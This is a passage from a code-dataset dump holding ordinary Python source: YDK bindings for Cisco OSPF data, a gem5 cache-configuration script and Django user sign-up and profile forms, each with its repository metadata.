                        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
            class ExternalLsa(Entity):
                """YDK binding for the external-lsa container under ospfv2-lsdb-external."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, self).__init__()
                    self.yang_name = "external-lsa"
                    self.yang_parent_name = "ospfv2-lsdb-external"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo))])
                    self._leafs = OrderedDict([
                        ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
                    ])
                    self.external_lsa_mask = None
                    self.external_topo = YList(self)
                    self._segment_path = lambda: "external-lsa"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, ['external_lsa_mask'], name, value)
                class ExternalTopo(Entity):
                    """YDK binding for the external-topo list node under external-lsa."""
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'
                    def __init__(self):
                        super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, self).__init__()
                        self.yang_name = "external-topo"
                        self.yang_parent_name = "external-lsa"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                            ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
                            ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
                            ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
                            ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
                        ])
                        self.mt_id = None
                        self.topo_metric_type = None
                        self.topo_metric = None
                        self.topo_forwarding_address = None
                        self.topo_route_tag = None
                        self._segment_path = lambda: "external-topo"
                        self._is_frozen = True
                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
            class NssaLsa(Entity):
                """YDK binding for the nssa-lsa container under ospfv2-lsdb-external."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, self).__init__()
                    self.yang_name = "nssa-lsa"
                    self.yang_parent_name = "ospfv2-lsdb-external"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo))])
                    self._leafs = OrderedDict([
                        ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
                    ])
                    self.external_lsa_mask = None
                    self.external_topo = YList(self)
                    self._segment_path = lambda: "nssa-lsa"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, ['external_lsa_mask'], name, value)
                class ExternalTopo(Entity):
                    """YDK binding for the external-topo list node under nssa-lsa."""
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'
                    def __init__(self):
                        super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, self).__init__()
                        self.yang_name = "external-topo"
                        self.yang_parent_name = "nssa-lsa"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                            ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
                            ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
                            ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
                            ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
                        ])
                        self.mt_id = None
                        self.topo_metric_type = None
                        self.topo_metric = None
                        self.topo_forwarding_address = None
                        self.topo_route_tag = None
                        self._segment_path = lambda: "external-topo"
                        self._is_frozen = True
                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
def clone_ptr(self):
self._top_entity = OspfOperData()
return self._top_entity
| true
| true
|
f705ab09a5963cd25258cf441567b8cdaf1b0983
| 10,096
|
py
|
Python
|
configs/common/CacheConfig.py
|
seanzw/UCLA-CS259-MachinesThatLearn-TensorCore
|
aece7fcdf97d2864fbb31e02940bfcdd470db7b9
|
[
"BSD-3-Clause"
] | 3
|
2019-07-19T22:52:27.000Z
|
2020-05-26T04:37:46.000Z
|
configs/common/CacheConfig.py
|
seanzw/UCLA-CS259-MachinesThatLearn-TensorCore
|
aece7fcdf97d2864fbb31e02940bfcdd470db7b9
|
[
"BSD-3-Clause"
] | 1
|
2019-07-22T16:41:56.000Z
|
2019-07-22T16:41:56.000Z
|
configs/common/CacheConfig.py
|
seanzw/UCLA-CS259-MachinesThatLearn-TensorCore
|
aece7fcdf97d2864fbb31e02940bfcdd470db7b9
|
[
"BSD-3-Clause"
] | 2
|
2019-06-26T14:33:42.000Z
|
2019-10-02T02:09:23.000Z
|
# Copyright (c) 2012-2013, 2015-2016 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2010 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Lisa Hsu
# Configure the M5 cache hierarchy config in one place
#
from __future__ import print_function
from __future__ import absolute_import
import m5
from m5.objects import *
from .Caches import *
from . import HWPConfig
def config_cache(options, system):
    """Configure the classic cache hierarchy for `system` from `options`.

    Builds per-CPU private split L1 caches (or external caches when an
    external memory system is requested), an optional shared L2 behind an
    L2XBar, optional hardware prefetchers, and wires every CPU's ports.
    Returns the (mutated) `system`.
    """
    if options.external_memory_system and (options.caches or options.l2cache):
        print("External caches and internal caches are exclusive options.\n")
        # NOTE(review): `sys` is not imported by the visible imports of this
        # module -- confirm a module-level `import sys` exists.
        sys.exit(1)

    if options.external_memory_system:
        ExternalCache = ExternalCacheFactory(options.external_memory_system)

    # Select the cache classes matching the CPU model in use.
    if options.cpu_type == "O3_ARM_v7a_3":
        try:
            import cores.arm.O3_ARM_v7a as core
        except ImportError:
            # Narrowed from a bare except: only a failed import should
            # trigger this fallback message.
            print("O3_ARM_v7a_3 is unavailable. Did you compile the O3 model?")
            sys.exit(1)

        dcache_class, icache_class, l2_cache_class, walk_cache_class = \
            core.O3_ARM_v7a_DCache, core.O3_ARM_v7a_ICache, \
            core.O3_ARM_v7aL2, \
            core.O3_ARM_v7aWalkCache
    elif options.cpu_type == "HPI":
        try:
            import cores.arm.HPI as core
        except ImportError:
            print("HPI is unavailable.")
            sys.exit(1)

        dcache_class, icache_class, l2_cache_class, walk_cache_class = \
            core.HPI_DCache, core.HPI_ICache, core.HPI_L2, core.HPI_WalkCache
    else:
        dcache_class, icache_class, l2_cache_class, walk_cache_class = \
            L1_DCache, L1_ICache, L2Cache, None

        if buildEnv['TARGET_ISA'] == 'x86':
            walk_cache_class = PageTableWalkerCache

    # Set the cache line size of the system
    system.cache_line_size = options.cacheline_size

    # If elastic trace generation is enabled, make sure the memory system is
    # minimal so that compute delays do not include memory access latencies.
    # Configure the compulsory L1 caches for the O3CPU, do not configure
    # any more caches.
    if options.l2cache and options.elastic_trace_en:
        fatal("When elastic trace is enabled, do not configure L2 caches.")

    if options.l2cache:
        # Provide a clock for the L2 and the L1-to-L2 bus here as they
        # are not connected using addTwoLevelCacheHierarchy. Use the
        # same clock as the CPUs.
        system.l2 = l2_cache_class(clk_domain=system.cpu_clk_domain,
                                   size=options.l2_size,
                                   assoc=options.l2_assoc)

        system.tol2bus = L2XBar(clk_domain = system.cpu_clk_domain)
        system.l2.cpu_side = system.tol2bus.master
        system.l2.mem_side = system.membus.slave

        if options.l2_hwp_type:
            hwpClass = HWPConfig.get(options.l2_hwp_type)
            # Consistency fix: compare against m5.params.NULL like the L1
            # checks below; the old comparison against the string "Null"
            # did not match the SimObject NULL parameter.
            if system.l2.prefetcher != m5.params.NULL:
                print("Warning: l2-hwp-type is set (", hwpClass, "), but",
                      "the current l2 has a default Hardware Prefetcher",
                      "of type", type(system.l2.prefetcher), ", using the",
                      "specified by the flag option.")
            system.l2.prefetcher = hwpClass()

    if options.memchecker:
        system.memchecker = MemChecker()

    for i in range(options.num_cpus):
        if options.caches:
            icache = icache_class(size=options.l1i_size,
                                  assoc=options.l1i_assoc)
            dcache = dcache_class(size=options.l1d_size,
                                  assoc=options.l1d_assoc)

            # If we have a walker cache specified, instantiate two
            # instances here
            if walk_cache_class:
                iwalkcache = walk_cache_class()
                dwalkcache = walk_cache_class()
            else:
                iwalkcache = None
                dwalkcache = None

            if options.memchecker:
                dcache_mon = MemCheckerMonitor(warn_only=True)
                dcache_real = dcache

                # Do not pass the memchecker into the constructor of
                # MemCheckerMonitor, as it would create a copy; we require
                # exactly one MemChecker instance.
                dcache_mon.memchecker = system.memchecker

                # Connect monitor
                dcache_mon.mem_side = dcache.cpu_side

                # Let CPU connect to monitors
                dcache = dcache_mon

            if options.l1d_hwp_type:
                hwpClass = HWPConfig.get(options.l1d_hwp_type)
                if dcache.prefetcher != m5.params.NULL:
                    print("Warning: l1d-hwp-type is set (", hwpClass, "), but",
                          "the current l1d has a default Hardware Prefetcher",
                          "of type", type(dcache.prefetcher), ", using the",
                          "specified by the flag option.")
                dcache.prefetcher = hwpClass()

            if options.l1i_hwp_type:
                hwpClass = HWPConfig.get(options.l1i_hwp_type)
                if icache.prefetcher != m5.params.NULL:
                    print("Warning: l1i-hwp-type is set (", hwpClass, "), but",
                          "the current l1i has a default Hardware Prefetcher",
                          "of type", type(icache.prefetcher), ", using the",
                          "specified by the flag option.")
                icache.prefetcher = hwpClass()

            # When connecting the caches, the clock is also inherited
            # from the CPU in question
            system.cpu[i].addPrivateSplitL1Caches(icache, dcache,
                                                  iwalkcache, dwalkcache)

            if options.memchecker:
                # The mem_side ports of the caches haven't been connected yet.
                # Make sure connectAllPorts connects the right objects.
                system.cpu[i].dcache = dcache_real
                system.cpu[i].dcache_mon = dcache_mon

        elif options.external_memory_system:
            # These port names are presented to whatever 'external' system
            # gem5 is connecting to.  Its configuration will likely depend
            # on these names.  For simplicity, we would advise configuring
            # it to use this naming scheme; if this isn't possible, change
            # the names below.
            if buildEnv['TARGET_ISA'] in ['x86', 'arm']:
                system.cpu[i].addPrivateSplitL1Caches(
                        ExternalCache("cpu%d.icache" % i),
                        ExternalCache("cpu%d.dcache" % i),
                        ExternalCache("cpu%d.itb_walker_cache" % i),
                        ExternalCache("cpu%d.dtb_walker_cache" % i))
            else:
                system.cpu[i].addPrivateSplitL1Caches(
                        ExternalCache("cpu%d.icache" % i),
                        ExternalCache("cpu%d.dcache" % i))

        system.cpu[i].createInterruptController()
        if options.l2cache:
            system.cpu[i].connectAllPorts(system.tol2bus, system.membus)
        elif options.external_memory_system:
            system.cpu[i].connectUncachedPorts(system.membus)
        else:
            system.cpu[i].connectAllPorts(system.membus)

    return system
# ExternalSlave provides a "port", but when that port connects to a cache,
# the connecting CPU SimObject wants to refer to its "cpu_side".
# The 'ExternalCache' class provides this adaptation by rewriting the name,
# eliminating distracting changes elsewhere in the config code.
class ExternalCache(ExternalSlave):
    """Adapter that lets an ExternalSlave stand in for a cache.

    CPU-side config code connects to a cache's "cpu_side"; this class
    transparently rewrites that attribute name to ExternalSlave's "port"
    so no other config code needs to change.
    """
    def __getattr__(cls, attr):
        # Redirect "cpu_side" lookups to the underlying "port".
        if (attr == "cpu_side"):
            attr = "port"
        # super(ExternalSlave, ...) deliberately starts MRO resolution
        # *after* ExternalSlave, so the rewritten name is handled by the
        # base SimObject attribute machinery.
        return super(ExternalSlave, cls).__getattr__(attr)
    def __setattr__(cls, attr, value):
        # Mirror of __getattr__: assignments to "cpu_side" go to "port".
        if (attr == "cpu_side"):
            attr = "port"
        return super(ExternalSlave, cls).__setattr__(attr, value)
def ExternalCacheFactory(port_type):
    """Return a constructor that builds named ExternalCache objects of the
    given external port type, each spanning all of memory."""
    def _build(port_name):
        cache = ExternalCache(port_data=port_name,
                              port_type=port_type,
                              addr_ranges=[AllMemory])
        return cache
    return _build
| 44.475771
| 79
| 0.639758
|
from __future__ import print_function
from __future__ import absolute_import
import m5
from m5.objects import *
from .Caches import *
from . import HWPConfig
def config_cache(options, system):
    """Configure the classic cache hierarchy for `system` from `options`.

    Builds per-CPU private split L1 caches (or external caches when an
    external memory system is requested), an optional shared L2 behind an
    L2XBar, optional hardware prefetchers, and wires every CPU's ports.
    Returns the (mutated) `system`.
    """
    if options.external_memory_system and (options.caches or options.l2cache):
        print("External caches and internal caches are exclusive options.\n")
        # NOTE(review): `sys` is not imported by the visible imports of this
        # module -- confirm a module-level `import sys` exists.
        sys.exit(1)

    if options.external_memory_system:
        ExternalCache = ExternalCacheFactory(options.external_memory_system)

    # Select the cache classes matching the CPU model in use.
    if options.cpu_type == "O3_ARM_v7a_3":
        try:
            import cores.arm.O3_ARM_v7a as core
        except ImportError:
            # Narrowed from a bare except: only a failed import should
            # trigger this fallback message.
            print("O3_ARM_v7a_3 is unavailable. Did you compile the O3 model?")
            sys.exit(1)

        dcache_class, icache_class, l2_cache_class, walk_cache_class = \
            core.O3_ARM_v7a_DCache, core.O3_ARM_v7a_ICache, \
            core.O3_ARM_v7aL2, \
            core.O3_ARM_v7aWalkCache
    elif options.cpu_type == "HPI":
        try:
            import cores.arm.HPI as core
        except ImportError:
            print("HPI is unavailable.")
            sys.exit(1)

        dcache_class, icache_class, l2_cache_class, walk_cache_class = \
            core.HPI_DCache, core.HPI_ICache, core.HPI_L2, core.HPI_WalkCache
    else:
        dcache_class, icache_class, l2_cache_class, walk_cache_class = \
            L1_DCache, L1_ICache, L2Cache, None

        if buildEnv['TARGET_ISA'] == 'x86':
            walk_cache_class = PageTableWalkerCache

    # Propagate the configured cache line size to the whole system.
    system.cache_line_size = options.cacheline_size

    # Elastic trace generation requires a minimal memory system so that
    # compute delays exclude memory access latencies: L1s only, no L2.
    if options.l2cache and options.elastic_trace_en:
        fatal("When elastic trace is enabled, do not configure L2 caches.")

    if options.l2cache:
        # The L2 and L1-to-L2 bus are not wired by
        # addTwoLevelCacheHierarchy, so give them the CPU clock here.
        system.l2 = l2_cache_class(clk_domain=system.cpu_clk_domain,
                                   size=options.l2_size,
                                   assoc=options.l2_assoc)

        system.tol2bus = L2XBar(clk_domain = system.cpu_clk_domain)
        system.l2.cpu_side = system.tol2bus.master
        system.l2.mem_side = system.membus.slave

        if options.l2_hwp_type:
            hwpClass = HWPConfig.get(options.l2_hwp_type)
            # Consistency fix: compare against m5.params.NULL like the L1
            # checks below; the old comparison against the string "Null"
            # did not match the SimObject NULL parameter.
            if system.l2.prefetcher != m5.params.NULL:
                print("Warning: l2-hwp-type is set (", hwpClass, "), but",
                      "the current l2 has a default Hardware Prefetcher",
                      "of type", type(system.l2.prefetcher), ", using the",
                      "specified by the flag option.")
            system.l2.prefetcher = hwpClass()

    if options.memchecker:
        system.memchecker = MemChecker()

    for i in range(options.num_cpus):
        if options.caches:
            icache = icache_class(size=options.l1i_size,
                                  assoc=options.l1i_assoc)
            dcache = dcache_class(size=options.l1d_size,
                                  assoc=options.l1d_assoc)

            # Instantiate per-CPU TLB-walker caches when the ISA uses them.
            if walk_cache_class:
                iwalkcache = walk_cache_class()
                dwalkcache = walk_cache_class()
            else:
                iwalkcache = None
                dwalkcache = None

            if options.memchecker:
                dcache_mon = MemCheckerMonitor(warn_only=True)
                dcache_real = dcache

                # Assign (not construct with) the memchecker so exactly one
                # MemChecker instance is shared, not copied.
                dcache_mon.memchecker = system.memchecker

                # Interpose the monitor between CPU and dcache.
                dcache_mon.mem_side = dcache.cpu_side
                dcache = dcache_mon

            if options.l1d_hwp_type:
                hwpClass = HWPConfig.get(options.l1d_hwp_type)
                if dcache.prefetcher != m5.params.NULL:
                    print("Warning: l1d-hwp-type is set (", hwpClass, "), but",
                          "the current l1d has a default Hardware Prefetcher",
                          "of type", type(dcache.prefetcher), ", using the",
                          "specified by the flag option.")
                dcache.prefetcher = hwpClass()

            if options.l1i_hwp_type:
                hwpClass = HWPConfig.get(options.l1i_hwp_type)
                if icache.prefetcher != m5.params.NULL:
                    print("Warning: l1i-hwp-type is set (", hwpClass, "), but",
                          "the current l1i has a default Hardware Prefetcher",
                          "of type", type(icache.prefetcher), ", using the",
                          "specified by the flag option.")
                icache.prefetcher = hwpClass()

            # The caches inherit the clock of the CPU they attach to.
            system.cpu[i].addPrivateSplitL1Caches(icache, dcache,
                                                  iwalkcache, dwalkcache)

            if options.memchecker:
                # The caches' mem_side ports are not yet connected; make
                # sure connectAllPorts wires the real cache and monitor.
                system.cpu[i].dcache = dcache_real
                system.cpu[i].dcache_mon = dcache_mon

        elif options.external_memory_system:
            # These port names are presented to the 'external' system gem5
            # connects to; its configuration likely depends on them.
            if buildEnv['TARGET_ISA'] in ['x86', 'arm']:
                system.cpu[i].addPrivateSplitL1Caches(
                        ExternalCache("cpu%d.icache" % i),
                        ExternalCache("cpu%d.dcache" % i),
                        ExternalCache("cpu%d.itb_walker_cache" % i),
                        ExternalCache("cpu%d.dtb_walker_cache" % i))
            else:
                system.cpu[i].addPrivateSplitL1Caches(
                        ExternalCache("cpu%d.icache" % i),
                        ExternalCache("cpu%d.dcache" % i))

        system.cpu[i].createInterruptController()
        if options.l2cache:
            system.cpu[i].connectAllPorts(system.tol2bus, system.membus)
        elif options.external_memory_system:
            system.cpu[i].connectUncachedPorts(system.membus)
        else:
            system.cpu[i].connectAllPorts(system.membus)

    return system
class ExternalCache(ExternalSlave):
    """Adapter that lets an ExternalSlave stand in for a cache.

    CPU-side config code connects to a cache's "cpu_side"; this class
    transparently rewrites that attribute name to ExternalSlave's "port"
    so no other config code needs to change.
    """
    def __getattr__(cls, attr):
        # Redirect "cpu_side" lookups to the underlying "port".
        if (attr == "cpu_side"):
            attr = "port"
        # super(ExternalSlave, ...) deliberately starts MRO resolution
        # *after* ExternalSlave, so the rewritten name is handled by the
        # base SimObject attribute machinery.
        return super(ExternalSlave, cls).__getattr__(attr)
    def __setattr__(cls, attr, value):
        # Mirror of __getattr__: assignments to "cpu_side" go to "port".
        if (attr == "cpu_side"):
            attr = "port"
        return super(ExternalSlave, cls).__setattr__(attr, value)
def ExternalCacheFactory(port_type):
    """Return a constructor that builds named ExternalCache objects of the
    given external port type, each spanning all of memory."""
    def _build(port_name):
        cache = ExternalCache(port_data=port_name,
                              port_type=port_type,
                              addr_ranges=[AllMemory])
        return cache
    return _build
| true
| true
|
f705ab4544bccecfcecc8f47c620ff3d110450c3
| 4,475
|
py
|
Python
|
users/user_forms.py
|
dennisfarmer/texas-hospital-hackathon
|
dabf80a2c3d78d595280d4ff9475176da4848349
|
[
"MIT"
] | null | null | null |
users/user_forms.py
|
dennisfarmer/texas-hospital-hackathon
|
dabf80a2c3d78d595280d4ff9475176da4848349
|
[
"MIT"
] | null | null | null |
users/user_forms.py
|
dennisfarmer/texas-hospital-hackathon
|
dabf80a2c3d78d595280d4ff9475176da4848349
|
[
"MIT"
] | null | null | null |
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm as BaseUserCreationForm
# from crispy_forms.helper import FormHelper
# from crispy_forms.layout import Submit
import sys
import os
from .models import User_Profile
# Make the project root importable so the sibling "orders" app resolves
# even when this module is loaded outside the normal Django path setup.
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
from orders.models import Location, Location_Info
from orders.locations import get_location_choices
class UserCreationForm(BaseUserCreationForm):
    """Sign-up form that also records a full name, hospital location and
    optional contact details on the user's auto-created profile."""

    name = forms.CharField(label="Full Name")
    # Pass the callable itself (not its result) so the hospital list is
    # re-evaluated for each form instead of frozen at import time.
    location_id = forms.ChoiceField(
        label="Hospital Location:",
        help_text="Select an option from the menu above.",
        choices=get_location_choices)
    email = forms.EmailField(
        required=False,
        label="Email",
        help_text="(not required)")
    phone = forms.CharField(
        required=False,
        max_length=12,
        label="Mobile Number",
        help_text="(not required)")

    class Meta:
        model = User
        fields = [
            "name",
            "username",
            "password1",
            "password2",
            "location_id",
            "email",
            "phone"
        ]

    def save(self, commit=True, *args, **kwargs):
        """Create the User; on commit, also populate the profile's phone
        and create a Location row for the chosen hospital."""
        user = super(UserCreationForm, self).save(commit=False, *args, **kwargs)
        # Split the free-form full name once: first word -> first_name,
        # last word -> last_name (middle names are dropped).
        parts = self.cleaned_data["name"].split()
        if len(parts) >= 2:
            user.first_name, user.last_name = parts[0].title(), parts[-1].title()
        elif len(parts) == 1:
            user.first_name = parts[0].title()
            user.last_name = ""
        else:
            # Blank name: fall back to empty strings explicitly.
            user.first_name = ""
            user.last_name = ""
        user.set_password(self.cleaned_data["password1"])
        user.email = self.cleaned_data["email"]
        if commit:
            user.save()
            user.profile.phone = self.cleaned_data["phone"]
            location_id = int(self.cleaned_data["location_id"])
            loc = Location(
                username=user.username,
                location_id=location_id,
                info=Location_Info.objects.filter(pk=location_id).first()
            )
            loc.save()
            user.profile.location = loc
            user.profile.save()
            user.save()
        return user
class UserUpdateForm(forms.ModelForm):
    """Lets a user edit their username and (optional) email address."""

    # Redeclared so the model's email field becomes optional on this form.
    email = forms.EmailField(
        required=False,
        label="Email",
        help_text="(not required)")

    def __init__(self, *args, **kwargs):
        # The declared field above would otherwise start blank: seed its
        # initial value from the bound User instance explicitly.
        email = kwargs.get("instance").email
        super(UserUpdateForm, self).__init__(*args, **kwargs)
        self.initial["email"] = email

    class Meta:
        model = User
        fields = ["username", "email"]
class ProfileUpdateForm(forms.ModelForm):
    """Edit the profile image, hospital location and phone number."""

    # Pass the callable itself so the hospital list is re-evaluated for
    # each form instead of frozen at import time.
    location_id = forms.ChoiceField(
        label="Hospital Location:",
        help_text="Select an option from the menu above.",
        choices=get_location_choices)
    phone = forms.CharField(
        required=False,
        max_length=12,
        label="Mobile Number",
        help_text="(not required)")

    def __init__(self, *args, **kwargs):
        # Seed the declared fields from the bound profile instance.
        location_id = kwargs.get("instance").location.location_id
        phone = kwargs.get("instance").phone
        super(ProfileUpdateForm, self).__init__(*args, **kwargs)
        self.initial["location_id"] = location_id
        self.initial["phone"] = phone

    class Meta:
        model = User_Profile
        fields = ["image", "location_id", "phone"]

    def save(self, commit=True, *args, **kwargs):
        """Save the profile; on commit, replace its Location row with one
        for the newly selected hospital."""
        profile = super(ProfileUpdateForm, self).save(commit=False, *args, **kwargs)
        if commit:
            profile.save()
            profile.phone = self.cleaned_data["phone"]
            new_location_id = int(self.cleaned_data["location_id"])
            profile.location.delete()
            # BUG FIX: Model.save() returns None, so the old code assigned
            # None to profile.location. Keep a reference to the instance
            # and save it separately.
            new_location = Location(
                username=self.instance.user.username,
                location_id=new_location_id,
                info=Location_Info.objects.filter(pk=new_location_id).first()
            )
            new_location.save()
            profile.location = new_location
            profile.save()
        return profile
| 33.646617
| 97
| 0.604469
|
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm as BaseUserCreationForm
import sys
import os
from .models import User_Profile
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
from orders.models import Location, Location_Info
from orders.locations import get_location_choices
class UserCreationForm(BaseUserCreationForm):
    """Sign-up form that also records a full name, hospital location and
    optional contact details on the user's auto-created profile."""

    name = forms.CharField(label="Full Name")
    # Pass the callable itself (not its result) so the hospital list is
    # re-evaluated for each form instead of frozen at import time.
    location_id = forms.ChoiceField(
        label="Hospital Location:",
        help_text="Select an option from the menu above.",
        choices=get_location_choices)
    email = forms.EmailField(
        required=False,
        label="Email",
        help_text="(not required)")
    phone = forms.CharField(
        required=False,
        max_length=12,
        label="Mobile Number",
        help_text="(not required)")

    class Meta:
        model = User
        fields = [
            "name",
            "username",
            "password1",
            "password2",
            "location_id",
            "email",
            "phone"
        ]

    def save(self, commit=True, *args, **kwargs):
        """Create the User; on commit, also populate the profile's phone
        and create a Location row for the chosen hospital."""
        user = super(UserCreationForm, self).save(commit=False, *args, **kwargs)
        # Split the free-form full name once: first word -> first_name,
        # last word -> last_name (middle names are dropped).
        parts = self.cleaned_data["name"].split()
        if len(parts) >= 2:
            user.first_name, user.last_name = parts[0].title(), parts[-1].title()
        elif len(parts) == 1:
            user.first_name = parts[0].title()
            user.last_name = ""
        else:
            # Blank name: fall back to empty strings explicitly.
            user.first_name = ""
            user.last_name = ""
        user.set_password(self.cleaned_data["password1"])
        user.email = self.cleaned_data["email"]
        if commit:
            user.save()
            user.profile.phone = self.cleaned_data["phone"]
            location_id = int(self.cleaned_data["location_id"])
            loc = Location(
                username=user.username,
                location_id=location_id,
                info=Location_Info.objects.filter(pk=location_id).first()
            )
            loc.save()
            user.profile.location = loc
            user.profile.save()
            user.save()
        return user
class UserUpdateForm(forms.ModelForm):
    """Lets a user edit their username and (optional) email address."""

    # Redeclared so the model's email field becomes optional on this form.
    email = forms.EmailField(
        required=False,
        label="Email",
        help_text="(not required)")

    def __init__(self, *args, **kwargs):
        # The declared field above would otherwise start blank: seed its
        # initial value from the bound User instance explicitly.
        bound_email = kwargs.get("instance").email
        super(UserUpdateForm, self).__init__(*args, **kwargs)
        self.initial["email"] = bound_email

    class Meta:
        model = User
        fields = ["username", "email"]
class ProfileUpdateForm(forms.ModelForm):
    """Edit the profile image, hospital location and phone number."""

    # Pass the callable itself so the hospital list is re-evaluated for
    # each form instead of frozen at import time.
    location_id = forms.ChoiceField(
        label="Hospital Location:",
        help_text="Select an option from the menu above.",
        choices=get_location_choices)
    phone = forms.CharField(
        required=False,
        max_length=12,
        label="Mobile Number",
        help_text="(not required)")

    def __init__(self, *args, **kwargs):
        # Seed the declared fields from the bound profile instance.
        location_id = kwargs.get("instance").location.location_id
        phone = kwargs.get("instance").phone
        super(ProfileUpdateForm, self).__init__(*args, **kwargs)
        self.initial["location_id"] = location_id
        self.initial["phone"] = phone

    class Meta:
        model = User_Profile
        fields = ["image", "location_id", "phone"]

    def save(self, commit=True, *args, **kwargs):
        """Save the profile; on commit, replace its Location row with one
        for the newly selected hospital."""
        profile = super(ProfileUpdateForm, self).save(commit=False, *args, **kwargs)
        if commit:
            profile.save()
            profile.phone = self.cleaned_data["phone"]
            new_location_id = int(self.cleaned_data["location_id"])
            profile.location.delete()
            # BUG FIX: Model.save() returns None, so the old code assigned
            # None to profile.location. Keep a reference to the instance
            # and save it separately.
            new_location = Location(
                username=self.instance.user.username,
                location_id=new_location_id,
                info=Location_Info.objects.filter(pk=new_location_id).first()
            )
            new_location.save()
            profile.location = new_location
            profile.save()
        return profile
| true
| true
|
f705ab6b22fcd6f8fa7f8f53688eda2185ea5ef3
| 1,971
|
py
|
Python
|
WebDemo/flask_app/main.py
|
silenceliang/Cascading-agents-hybridSum
|
6c127df51bd8cc926878f62ebdb66bc1042bb58c
|
[
"MIT"
] | 1
|
2020-02-23T15:38:18.000Z
|
2020-02-23T15:38:18.000Z
